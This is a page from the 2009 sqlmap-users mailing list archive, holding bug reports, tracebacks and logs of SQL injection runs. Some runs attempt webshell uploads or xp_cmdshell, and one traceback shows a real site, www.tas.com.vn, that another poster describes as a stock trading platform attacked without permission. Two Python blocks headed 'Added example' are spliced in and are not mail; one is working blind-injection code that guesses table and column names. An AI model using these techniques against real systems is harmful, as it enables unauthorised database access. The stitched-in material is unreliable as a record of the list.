sqlmap-users Mailing List for sqlmap (Page 136)
Brought to you by: inquisb
From: Erik N. <da...@gm...> - 2009-09-08 12:48:12

sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=107765125.29.10.1252406202; __utmc=107765125; PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id --string="Secret Forum" --fingerprint

[14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[14:09:04] [INFO] testing for parenthesis on injectable parameter
[14:09:06] [INFO] the injectable parameter requires 0 parenthesis
[14:09:06] [INFO] testing MySQL
[14:09:07] [INFO] confirming MySQL
[14:09:08] [INFO] retrieved:
[14:09:10] [INFO] the back-end DBMS is MySQL
[14:09:10] [INFO] retrieved:
[14:11:28] [INFO] retrieved:
[14:11:32] [INFO] retrieved:
[14:11:35] [INFO] retrieved:
[14:11:41] [INFO] retrieved:
[14:11:46] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: active fingerprint: MySQL < 3.22.11
               comment injection fingerprint: MySQL 5.0.75

[*] shutting down at: 14:12:50

sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2; __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=107765125.29.10.1252406202; __utmc=107765125; PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9" --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id --string="Secret Forum" --current-db

[14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[14:14:01] [INFO] testing for parenthesis on injectable parameter
[14:14:03] [INFO] the injectable parameter requires 0 parenthesis
[14:14:03] [INFO] testing MySQL
[14:14:04] [INFO] confirming MySQL
[14:14:05] [INFO] retrieved:
[14:14:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: MySQL < 5.0.0
[14:14:07] [INFO] fetching current database
[14:14:07] [INFO] retrieved:
current database: None

What to do?
From: Kyle A. <ky...@xk...> - 2009-09-07 01:05:08

Hello,

Can anyone think of a way to use sqlmap in a situation with clean URLs using mod_rewrite? (Which is very popular nowadays.) An example might be my MythTV web interface:

http://192.168.1.1/mythweb/tv/detail/1004/1252278000

Internally it is reading the module, chanid, and start time from the URL. It is NOT possible to use something like index.php?chanid=104&time=1254...

Is there any way to use sqlmap in this situation?

Kyle
From: Matthias K. <zac...@gm...> - 2009-08-26 21:06:06

Hi SQLMAP-Team,

I'd like to send you a bug report. If you need more details (e.g. URL) just let me know!

Thanks for your support,
Zach

------------

[23:02:24] [ERROR] unhandled exception in sqlmap/0.8-dev1, please copy the command line and the following text and send by e-mail to sql...@li... . The developer will fix it as soon as possible:
sqlmap version: 0.8-dev1
Python version: 2.6.2
Operating system: darwin
Traceback (most recent call last):
  File "./sqlmap.py", line 84, in main
    start()
  File "/Users/zach/SQL/sqlmap/lib/controller/controller.py", line 210, in start
    injType = checkSqlInjection(place, parameter, value, parenthesis)
  File "/Users/zach/SQL/sqlmap/lib/controller/checks.py", line 98, in checkSqlInjection
    trueResult = Request.queryPage(payload, place)
  File "/Users/zach/SQL/sqlmap/lib/request/connect.py", line 274, in queryPage
    page, headers = Connect.getPage(get=get, post=post, cookie=cookie, ua=ua, silent=silent)
  File "/Users/zach/SQL/sqlmap/lib/request/connect.py", line 166, in getPage
    page = conn.read()
  File "/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/socket.py", line 327, in read
    data = self._sock.recv(rbufsize)
  File "/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py", line 517, in read
    return self._read_chunked(amt)
  File "/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py", line 578, in _read_chunked
    value += self._safe_read(chunk_left)
  File "/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py", line 619, in _safe_read
    raise IncompleteRead(''.join(s), amt)
IncompleteRead: IncompleteRead(328 bytes read, 7260 more expected)

[*] shutting down at: 23:02:24
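The traceback above ends in httplib's chunked-transfer reader: the server closed the connection before the announced chunk had fully arrived, and the tool died instead of using the bytes it had. The following is an added example (it is not sqlmap's code and not from the poster) that reproduces the condition offline with a constructed, truncated HTTP/1.1 chunked response replayed through a fake socket, and shows how a scanner that compares page content can keep the chunks that did arrive rather than abort the run:

```python
"""Tolerate a chunked HTTP response that the server cuts short.

Added example, not sqlmap code: a canned HTTP/1.1 response replayed
through a fake socket reproduces the IncompleteRead from the report, and
the reader keeps the chunks that did arrive instead of crashing.
"""
import http.client
import io

# Constructed response: the first chunk (0x10 = 16 bytes) is complete, the
# second announces 0x200 bytes but the connection ends after a few of them.
TRUNCATED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"10\r\n"
    b"<html><body>Secr\r\n"
    b"200\r\n"
    b"et Forum</body>"  # connection dropped here: no CRLF, no final 0-chunk
)

# Constructed well-formed response for comparison ("Secret Forum" = 0xc bytes).
COMPLETE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"c\r\n"
    b"Secret Forum\r\n"
    b"0\r\n"
    b"\r\n"
)


class CannedSocket:
    """Stand-in for a socket: http.client.HTTPResponse only needs makefile()."""

    def __init__(self, raw):
        self._raw = raw

    def makefile(self, mode="rb", *args, **kwargs):
        return io.BytesIO(self._raw)


def read_body_tolerant(raw):
    """Parse a raw HTTP response and return (body, complete).

    On a truncated chunked body the fully received chunks are returned with
    complete=False, so a caller that compares page content (the --string
    check, for instance) can still decide or retry instead of aborting.
    """
    resp = http.client.HTTPResponse(CannedSocket(raw), method="GET")
    resp.begin()
    try:
        return resp.read(), True
    except http.client.IncompleteRead as exc:
        # exc.partial holds every chunk that arrived intact; http.client
        # discards the bytes of the chunk that was cut off.
        return exc.partial, False


if __name__ == "__main__":
    for raw in (COMPLETE_RESPONSE, TRUNCATED_RESPONSE):
        body, complete = read_body_tolerant(raw)
        print("complete=%s body=%r" % (complete, body))
```

Whether a partial page should count as a "true" or "false" response is a policy decision for the caller; what matters is that the decision is made deliberately, with the partial body and the missing-byte count in hand, instead of by an uncaught exception.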
From: Patrick W. <pa...@au...> - 2009-08-25 10:40:48

If you read the error - permission denied to write file... fixing your folder permissions would help!

Though I would advise against using SQL injection against the Vietnam Stock Trading Platform without legal permission.

-Patrick

On Mon, Aug 24, 2009 at 11:16 AM, dang tu <tud...@gm...> wrote:
> [12:04:58] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> [12:05:00] [WARNING] Cookie parameter 'jsessionid' is not dynamic
> [12:05:04] [ERROR] unhandled exception in sqlmap/0.7rc1, please copy the
> command line and the following text and send by e-mail to
> sql...@li.... The developer will fix it as soon as
> possible:
> sqlmap version: 0.7rc1
> Python version: 2.5.2
> Operating system: linux2
> Traceback (most recent call last):
>   File "./sqlmap.py", line 81, in main
>     start()
>   File "/space/backtrack/microverse/s/sqlmap/SQLMAP-0.6.4-BT1/pentest/database/sqlmap/lib/controller/controller.py", line 264, in start
>   File "/space/backtrack/microverse/s/sqlmap/SQLMAP-0.6.4-BT1/pentest/database/sqlmap/lib/core/target.py", line 234, in createTargetDirs
>   File "/space/backtrack/microverse/s/sqlmap/SQLMAP-0.6.4-BT1/pentest/database/sqlmap/lib/core/dump.py", line 62, in setOutputFile
> IOError: [Errno 13] Permission denied: '/pentest/database/sqlmap/output/www.tas.com.vn/log'
>
> [*] shutting down at: 12:05:04
>
> ------------------------------------------------------------------------------
> Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day
> trial. Simplify your report design, integration and deployment - and focus on
> what you do best, core application coding. Discover what's new with
> Crystal Reports now. http://p.sf.net/sfu/bobj-july
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
From: Ignacio H. <nac...@gm...> - 2009-08-24 19:10:03

Hi all,

There is an error in one of the regexes used to find absolute file paths in order to upload a shell when 'stacked queries' are not available on the parameter. The regex is "([\w]\:[\/\\\\]+)", located at line 76 of file /sqlmap/lib/request. I don't know why (because I don't understand that regex) but it always finds a positive match in "p:" and sometimes in "s:" and gives it back as an absolute file path. I think it is due to URL strings in the page code. The regex matches things like "http:\\domain.com/whatever" and returns "p:" as a valid absolute path (or "s:" if the URL is SSL). To avoid this maybe the regex can be changed to "([\r\w]\:[\/\\\\]+)" if the real absolute file path is at the beginning of a word.

This happens in version 7.0 and 0.8-dev1, and in version 0.8-dev1 there is also something else wrong with --os-shell: after providing full paths and the language that the server supports it just can't connect to the server. This is the output:

[20:25:18] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]:
[20:26:09] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [/var/www/test/]:
[20:26:51] [INFO] trying to upload the uploader agent
which web application language does the web server support?
[1] ASP
[2] PHP (default)
[3] JSP
> 2
[20:26:57] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request
[20:26:58] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request
[20:26:59] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request
[20:27:00] [ERROR] unable to connect to the target url or proxy

This doesn't happen in version 7.0.

Cheers,
Nacho
From: dang tu <tud...@gm...> - 2009-08-24 01:16:42

[12:04:58] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[12:05:00] [WARNING] Cookie parameter 'jsessionid' is not dynamic
[12:05:04] [ERROR] unhandled exception in sqlmap/0.7rc1, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.7rc1
Python version: 2.5.2
Operating system: linux2
Traceback (most recent call last):
  File "./sqlmap.py", line 81, in main
    start()
  File "/space/backtrack/microverse/s/sqlmap/SQLMAP-0.6.4-BT1/pentest/database/sqlmap/lib/controller/controller.py", line 264, in start
  File "/space/backtrack/microverse/s/sqlmap/SQLMAP-0.6.4-BT1/pentest/database/sqlmap/lib/core/target.py", line 234, in createTargetDirs
  File "/space/backtrack/microverse/s/sqlmap/SQLMAP-0.6.4-BT1/pentest/database/sqlmap/lib/core/dump.py", line 62, in setOutputFile
IOError: [Errno 13] Permission denied: '/pentest/database/sqlmap/output/www.tas.com.vn/log'

[*] shutting down at: 12:05:04
From: ehmo <dis...@gm...> - 2009-08-23 21:31:57

[18:57:06] [INFO] testing stacked queries support on parameter 'ID'
[18:57:13] [INFO] the web application supports stacked queries on parameter 'ID'
[18:57:13] [INFO] testing if current user is DBA
[18:57:13] [INFO] retrieved: 0
[18:57:26] [WARNING] the functionality requested might not work because the session user is not a database administrator
[18:57:26] [INFO] checking if xp_cmdshell extended procedure is available, wait..
xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] y
[20:30:00] [ERROR] unhandled exception in sqlmap/0.8-dev1, please copy the command line and the following text and send by e-mail to sql...@li...urceforge.net. The developer will fix it as soon as possible:
sqlmap version: 0.8-dev1
Python version: 2.5.4
Operating system: win32
Traceback (most recent call last):
  File "c:\dev\sqlmap-dev\sqlmap.py", line 84, in main
    start()
  File "c:\dev\sqlmap-dev\lib\controller\controller.py", line 263, in start
    action()
  File "c:\dev\sqlmap-dev\lib\controller\action.py", line 140, in action
    conf.dbmsHandler.osShell()
  File "c:\dev\sqlmap-dev\plugins\generic\takeover.py", line 300, in osShell
    self.initEnv()
  File "c:\dev\sqlmap-dev\lib\takeover\abstraction.py", line 168, in initEnv
    self.xpCmdshellInit(mandatory)
  File "c:\dev\sqlmap-dev\lib\takeover\xp_cmdshell.py", line 181, in xpCmdshellInit
    self.__xpCmdshellConfigure(1)
  File "c:\dev\sqlmap-dev\lib\takeover\xp_cmdshell.py", line 106, in __xpCmdshellConfigure
    if kb.dbmsVersion[0] in ( "2005", "2008" ):
IndexError: list index out of range
From: <ja...@ev...> - 2009-08-20 01:27:33

Hi,

Newest SVN. Python is rather old on this box; I'd be willing to upgrade and retry if this error isn't reproducible.

[17:44:45] [WARNING] the functionality requested might not work because the session user is not a database administrator
[17:44:45] [INFO] checking if xp_cmdshell extended procedure is available, wait..
xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] y
[17:45:05] [ERROR] unhandled exception in sqlmap/0.8-dev1, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.8-dev1
Python version: 2.4.4
Operating system: linux2
Traceback (most recent call last):
  File "./sqlhax", line 84, in main
    start()
  File "/nfs/sqlmap/lib/controller/controller.py", line 263, in start
    action()
  File "/nfs/sqlmap/lib/controller/action.py", line 140, in action
    conf.dbmsHandler.osShell()
  File "/nfs/sqlmap/plugins/generic/takeover.py", line 300, in osShell
    self.initEnv()
  File "/nfs/sqlmap/lib/takeover/abstraction.py", line 168, in initEnv
    self.xpCmdshellInit(mandatory)
  File "/nfs/sqlmap/lib/takeover/xp_cmdshell.py", line 181, in xpCmdshellInit
    self.__xpCmdshellConfigure(1)
  File "/nfs/sqlmap/lib/takeover/xp_cmdshell.py", line 106, in __xpCmdshellConfigure
    if kb.dbmsVersion[0] in ( "2005", "2008" ):
IndexError: list index out of range

Also, for anyone on the list who is actually interested, check out this cheat sheet, it's pretty awesome.
http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/

Cheers,
James
From: Bernardo D. A. G. <ber...@gm...> - 2009-08-19 07:43:28

Hi Walter,

On Mon, Aug 17, 2009 at 18:34, Walter Stanish<wal...@sa...> wrote:
> ...
> - no automatic extraction of forms / ajax URLs (could detect common
> javascript framework ajax requests/URLs from linked .js sourcefiles)

sqlmap has no crawling/spidering functionality and I have no plans to implement such. However, you can surf the site via WebScarab or Burp logging all requests in a log file then pass it to sqlmap with the -l command line option.

> … There should be an option to 'force testing of all parameters' or
> 'force testing of specific parameters'. (I had to hack the source to make
> checkDynParam 'return True' to fix this.)

Read the manual, also -h is enough for the list of options! The option is -p. It skips the dynamicity test.

> - you could also add 'Accept-lang:' as a field to test, as some
> multilingual sites will be parsing this

I will refactor the detection phase in the mid term and perhaps include this too.

Cheers,

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: ehmo <dis...@gm...> - 2009-08-16 00:45:40

Hey guys,

I'm very curious about this thing. If the back-end DB is MySQL < 5.0, sqlmap will always stop table lookup with this error:

[ERROR] information_schema not available, back-end DBMS is MySQL < 5.0

But this MySQL version doesn't have information_schema and I'm curious why it will not try to guess all tables. Or is there any way in sqlmap to get the list of tables if information_schema is not available?

Also, you should add an option for injecting the Referer, because sometimes there is SQLi there and sqlmap doesn't know this method.

thnx
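The question above is a fair one: without information_schema, table names cannot be read, but their existence can still be tested one candidate at a time through the same boolean-based injection that found the bug. A subquery against a table that exists evaluates cleanly and the page keeps its "true" content; a subquery against a table that does not exist makes the whole query fail and the page changes. The following is an added example, not sqlmap code: an in-memory SQLite database stands in for the vulnerable MySQL < 5.0 application (constructed), and the wordlist-driven guesser works on tables and then on columns of a table it found.

```python
"""Guess table and column names blind when information_schema is missing.

Added example, not sqlmap code. An in-memory SQLite database stands in for
the vulnerable MySQL < 5.0 application (constructed); the technique is the
same: (SELECT COUNT(*) FROM t) >= 0 is true for any table that exists, even
an empty one, and errors out ("no such table") for one that does not.
"""
import sqlite3


def make_vulnerable_page():
    """Constructed stand-in for the forum page: the id parameter is
    concatenated straight into the query (deliberately vulnerable)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE forum(id INTEGER, title TEXT);
        CREATE TABLE users(id INTEGER, name TEXT, passwd TEXT);
        INSERT INTO forum VALUES (8, 'Secret Forum');
        INSERT INTO users VALUES (1, 'admin', 'x');
        """
    )

    def page(param_id):
        sql = "SELECT title FROM forum WHERE id = " + param_id  # injectable
        try:
            row = db.execute(sql).fetchone()
        except sqlite3.Error:
            return "<h1>Database error</h1>"
        return "<h1>%s</h1>" % (row[0] if row else "No such forum")

    return page


def _is_true(page, base_value, condition, true_string):
    """Boolean oracle: append AND <condition> to a known-good value and check
    whether the page still carries the string seen in the true case."""
    return true_string in page("%s AND %s" % (base_value, condition))


def guess_tables(page, candidates, base_value="8", true_string="Secret Forum"):
    """Return the candidate table names that exist in the back-end database.

    Candidates come from a wordlist, never from untrusted input, since they
    are interpolated into the probe as identifiers.
    """
    return [
        t for t in candidates
        if _is_true(page, base_value, "(SELECT COUNT(*) FROM %s) >= 0" % t, true_string)
    ]


def guess_columns(page, table, candidates, base_value="8", true_string="Secret Forum"):
    """Same trick one level down: COUNT(col) errors out for a missing column."""
    return [
        c for c in candidates
        if _is_true(page, base_value,
                    "(SELECT COUNT(%s) FROM %s) >= 0" % (c, table), true_string)
    ]


if __name__ == "__main__":
    page = make_vulnerable_page()
    tables = guess_tables(page, ["posts", "users", "admin", "forum"])
    print("tables:", tables)
    for t in tables:
        print(t, "columns:", guess_columns(page, t, ["id", "email", "name", "passwd", "title"]))
```

Each candidate costs one request, so the wordlist decides the run time; on real MySQL 4.x the probe is the same text, and the error page is whatever the application returns when mysql_query() fails.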
From: Ľuboš K. <lub...@gm...> - 2009-08-13 11:08:39

Hello,

I have an issue with sqlmap 0.7. I know that the parameter vid from the URL I want to test is injectable with UNION but sqlmap comes to the conclusion that it isn't:

[12:53:04] [WARNING] GET parameter 'vid' is not injectable

I also provided the string which is in the page content of the URL I provided. DB is MySQL 5.0. If you want I can give you the URL so you can debug why it evaluates badly.

Regards,
Lubos
From: Bernardo D. A. G. <ber...@gm...> - 2009-08-11 09:17:41

Hi Lee,

On Mon, Aug 10, 2009 at 16:11, Lawson, Lee<Lee...@dn...> wrote:
> ...
> [16:08:53] [ERROR] unhandled exception in sqlmap/0.7, please copy the
> command line and the following text and send by e-mail to sqlmap-users
> @lists.sourceforge.net. The developer will fix it as soon as possible:
> sqlmap version: 0.7
> Python version: 2.6.1
> Operating system: win32
> Traceback (most recent call last):
>   File "sqlmap.py", line 84, in main
>   File "lib\controller\controller.pyc", line 263, in start
>   File "lib\controller\action.pyc", line 97, in action
>   File "plugins\generic\enumeration.pyc", line 176, in getUsers
> IndexError: list index out of range

Thanks for reporting. It should be fixed now. svn update.

Cheers,

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2009-08-10 09:44:28

Hi pUm,

On Fri, Aug 7, 2009 at 09:19, pUm<hi...@go...> wrote:
> ...
> bugs:
> 1. encoding %:
> the percent is encoded - really strange. If you put in %25 it will
> encode it to %% and stuff like that. we were not able to inject a %
> only on one parameter.

This is something I will have a closer look at soon.

> 2. postfix/prefix string:
> the postfix string just disappears on some requests (post request)

I can't reproduce this bug. Can you please double check and send me the exact -v 3 output?

> 3. testing connection
> on post injection the test connect to the url is done as a get
> request, even if you provided --data, this is a bad thing, for us it
> logged out the user after doing a get request on a post request ;)

In my tests and from the source code it is clear that if you specify --data it always goes with the HTTP POST method. Also, I sniffed the traffic to double check it, and it goes POST from the very first HTTP request.

> suggested enhancements:
> - define the "random" char that gets injected on a true injection (so
> that it does not becomes so much more random ;)) - I will write a
> patch for this if I've got some time

What's the benefit?

> - using OR instead of AND, I know, you've got the request a way to
> often, but I've actually got again a reason for this to raise up again
> ;)
> - running time and stacked queries without the AND injection. for
> example, test all stacked query possiblities ...

In the long run the SQL injection detection phase will be done by parsing a (huge) XML file where the user will be able to define fewer or more tests to do; the engine will then be completely rewritten to parse this XML file.

> thanks for the nice tool. I really enjoy it

Welcome!

Cheers,

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: pUm <hi...@go...> - 2009-08-07 08:20:06

Hi all,

we came across a few bugs in sqlmap during one of our tests.

bugs:
1. encoding %:
the percent is encoded - really strange. If you put in %25 it will encode it to %% and stuff like that. We were not able to inject a % only on one parameter.
2. postfix/prefix string:
the postfix string just disappears on some requests (POST request)
3. testing connection
on POST injection the test connection to the URL is done as a GET request, even if you provided --data. This is a bad thing; for us it logged out the user after doing a GET request on a POST request ;)

suggested enhancements:
- define the "random" char that gets injected on a true injection (so that it does not become so much more random ;)) - I will write a patch for this if I've got some time
- using OR instead of AND. I know you've got this request way too often, but I've actually got a reason for raising it again ;)
- running time and stacked queries without the AND injection, for example, test all stacked query possibilities ...

thanks for the nice tool. I really enjoy it

cheers
sven

P.S.: using the latest svn version
From: Bernardo D. A. G. <ber...@gm...> - 2009-07-30 12:05:47

Hi Stuffe,

On Wed, Jul 29, 2009 at 17:22, Stuffe<stu...@gm...> wrote:
> I just fired up the version of sqlmap, but it couldn't find the web root,
> although it should be simple to do.
> A simple regex could identify all PHP errors, they all start like <b>Parse
> error</b>:, <b>Notice</b>:, <b>Warning</b>:, <b>Fatal error</b>: etc.
> After that comes some random crap and then comes the URL you are looking
> for, inside a <b> tag, e.g. <b>C:\wamp\www\index.php</b>.
> Here are some examples:
> <b>Notice</b>: Undefined index: b in <b>C:\wamp\www\index.php</b> on line
> <b>12</b>
> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL
> result resource in <b>C:\wamp\www\index.php</b> on line <b>14</b>
> <b>Parse error</b>: parse error, expecting `'('' in
> <b>C:\wamp\www\index.php</b> on line <b>28</b>
> As you can see, they are not hard to extract with a regex. And they can
> often be generated, if you insert something that breaks the SQL query or by
> typecasting a GET var as an array
> (like index.php?a[]=now_a_becomes_an_array) or other tricks.

I will improve the HTML parsing function as soon as possible, thanks for reporting.

> Anyway, when the error message is found, it should be checked whether or
> not the last part of the URL is equal to the last part of the internal
> path; if they are equal, you know the webroot.
> ...

This is done already. If it does not work, then it's a bug. Let me know.

> Anyway, it also crashed on me when I tried to upload a webshell:
> C:\Documents and Settings\Administrator>"C:\Documents and Settings\Administrator\Desktop\sqlmap-0.7_exe\sqlmap.exe" -u http://localhost/?a=1 --os-shell
>
>     sqlmap/0.7
>     by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 17:37:18
>
> [17:37:18] [INFO] testing connection to the target url
> [17:37:18] [INFO] testing if the url is stable, wait a few seconds
> [17:37:19] [INFO] url is stable
> [17:37:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> [17:37:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> [17:37:20] [INFO] testing if GET parameter 'a' is dynamic
> [17:37:20] [INFO] confirming that GET parameter 'a' is dynamic
> [17:37:20] [INFO] GET parameter 'a' is dynamic
> [17:37:20] [INFO] testing sql injection on GET parameter 'a' with 0 parenthesis
> [17:37:20] [INFO] testing unescaped numeric injection on GET parameter 'a'
> [17:37:20] [INFO] confirming unescaped numeric injection on GET parameter 'a'
> [17:37:20] [INFO] GET parameter 'a' is unescaped numeric injectable with 0 parenthesis
> [17:37:20] [INFO] testing for parenthesis on injectable parameter
> [17:37:20] [INFO] the injectable parameter requires 0 parenthesis
> [17:37:20] [INFO] testing MySQL
> [17:37:20] [INFO] confirming MySQL
> [17:37:20] [INFO] retrieved: 9
> [17:37:20] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: Apache 2.0.63, PHP 5.2.9
> back-end DBMS: MySQL >= 5.0.0
> [17:37:20] [INFO] testing stacked queries support on parameter 'a'
> [17:37:20] [INFO] detecting back-end DBMS version from its banner
> [17:37:20] [INFO] retrieved: 5.1.33
> [17:37:20] [WARNING] the web application does not support stacked queries on parameter 'a'
> [17:37:20] [INFO] going to upload a web page backdoor for command execution
> [17:37:20] [INFO] fingerprinting the back-end DBMS operating system
> [17:37:20] [INFO] retrieved: c
> [17:37:20] [INFO] the back-end DBMS operating system is Windows
> [17:37:20] [WARNING] unable to retrieve the web server document root
> please provide the web server document root [C:/Inetpub/wwwroot/]: C:/wamp/www/
> [17:37:46] [INFO] retrieved web server full paths: 'C:\wamp\www, C:\'
> please provide any additional web server full path to try to upload the agent [C:/Inetpub/wwwroot/test/]: C:/wamp/www/test/
> [17:37:51] [INFO] trying to upload the uploader agent
> which web application language does the web server support?
> [1] ASP
> [2] PHP (default)
> [3] JSP
> > 2
> [17:37:53] [ERROR] unhandled exception in sqlmap/0.7, please copy the command line and the following text and send by e-mail to sql...@li...urceforge.net. The developer will fix it as soon as possible:
> sqlmap version: 0.7
> Python version: 2.6.1
> Operating system: win32
> Traceback (most recent call last):
>   File "sqlmap.py", line 84, in main
>   File "lib\controller\controller.pyc", line 263, in start
>   File "lib\controller\action.pyc", line 140, in action
>   File "plugins\generic\takeover.pyc", line 295, in osShell
>   File "plugins\generic\takeover.pyc", line 187, in __webBackdoorInit
>   File "lib\request\connect.pyc", line 131, in getPage
>   File "urllib2.pyc", line 124, in urlopen
>   File "urllib2.pyc", line 383, in open
>   File "urllib2.pyc", line 401, in _open
>   File "urllib2.pyc", line 361, in _call_chain
>   File "urllib2.pyc", line 1130, in http_open
>   File "urllib2.pyc", line 1087, in do_open
>   File "httplib.pyc", line 656, in __init__
>   File "httplib.pyc", line 668, in _set_hostport
> InvalidURL: nonnumeric port: '80\test'
>
> [*] shutting down at: 17:37:53

This bug is fixed and committed now. Please, let me know if the web root works properly in your test environment or if you find any other bug.

Cheers,

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Stuffe <stu...@gm...> - 2009-07-29 16:22:37

I just fired up the version of sqlmap, but it couldn't find the web root, although it should be simple to do.

A simple regex could identify all PHP errors, they all start like <b>Parse error</b>:, <b>Notice</b>:, <b>Warning</b>:, <b>Fatal error</b>: etc. After that comes some random crap and then comes the URL you are looking for, inside a <b> tag, e.g. <b>C:\wamp\www\index.php</b>. Here are some examples:

<b>Notice</b>: Undefined index: b in <b>C:\wamp\www\index.php</b> on line <b>12</b>
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>C:\wamp\www\index.php</b> on line <b>14</b>
<b>Parse error</b>: parse error, expecting `'('' in <b>C:\wamp\www\index.php</b> on line <b>28</b>

As you can see, they are not hard to extract with a regex. And they can often be generated, if you insert something that breaks the SQL query or by typecasting a GET var as an array (like index.php?a[]=now_a_becomes_an_array) or other tricks.

Anyway, when the error message is found, it should be checked whether or not the last part of the URL is equal to the last part of the internal path; if they are equal, you know the webroot. E.g. http://example.com/whatever/index.php gives the error:

<b>Notice</b>: Undefined index: b in <b>C:\wamp\www\whatever\index.php</b> on line <b>12</b>

You replace \ with / and compare http://example.com/whatever/index.php with C:/wamp/www/whatever/index.php and find that C:/wamp/www/ must be the webroot.

Now I don't know if or how sqlmap is trying to retrieve the webroot, but it wasn't able to find these things in my tests (even though they were all over the place).

Anyway, it also crashed on me when I tried to upload a webshell:

C:\Documents and Settings\Administrator>"C:\Documents and Settings\Administrator\Desktop\sqlmap-0.7_exe\sqlmap.exe" -u http://localhost/?a=1 --os-shell

    sqlmap/0.7
    by Bernardo Damele A. G. <ber...@gm...>

[*] starting at: 17:37:18

[17:37:18] [INFO] testing connection to the target url
[17:37:18] [INFO] testing if the url is stable, wait a few seconds
[17:37:19] [INFO] url is stable
[17:37:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[17:37:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[17:37:20] [INFO] testing if GET parameter 'a' is dynamic
[17:37:20] [INFO] confirming that GET parameter 'a' is dynamic
[17:37:20] [INFO] GET parameter 'a' is dynamic
[17:37:20] [INFO] testing sql injection on GET parameter 'a' with 0 parenthesis
[17:37:20] [INFO] testing unescaped numeric injection on GET parameter 'a'
[17:37:20] [INFO] confirming unescaped numeric injection on GET parameter 'a'
[17:37:20] [INFO] GET parameter 'a' is unescaped numeric injectable with 0 parenthesis
[17:37:20] [INFO] testing for parenthesis on injectable parameter
[17:37:20] [INFO] the injectable parameter requires 0 parenthesis
[17:37:20] [INFO] testing MySQL
[17:37:20] [INFO] confirming MySQL
[17:37:20] [INFO] retrieved: 9
[17:37:20] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.9
back-end DBMS: MySQL >= 5.0.0
[17:37:20] [INFO] testing stacked queries support on parameter 'a'
[17:37:20] [INFO] detecting back-end DBMS version from its banner
[17:37:20] [INFO] retrieved: 5.1.33
[17:37:20] [WARNING] the web application does not support stacked queries on parameter 'a'
[17:37:20] [INFO] going to upload a web page backdoor for command execution
[17:37:20] [INFO] fingerprinting the back-end DBMS operating system
[17:37:20] [INFO] retrieved: c
[17:37:20] [INFO] the back-end DBMS operating system is Windows
[17:37:20] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/Inetpub/wwwroot/]: C:/wamp/www/
[17:37:46] [INFO] retrieved web server full paths: 'C:\wamp\www, C:\'
please provide any additional web server full path to try to upload the agent [C:/Inetpub/wwwroot/test/]: C:/wamp/www/test/
[17:37:51] [INFO] trying to upload the uploader agent
which web application language does the web server support?
[1] ASP
[2] PHP (default)
[3] JSP
> 2
[17:37:53] [ERROR] unhandled exception in sqlmap/0.7, please copy the command line and the following text and send by e-mail to sql...@li...urceforge.net. The developer will fix it as soon as possible:
sqlmap version: 0.7
Python version: 2.6.1
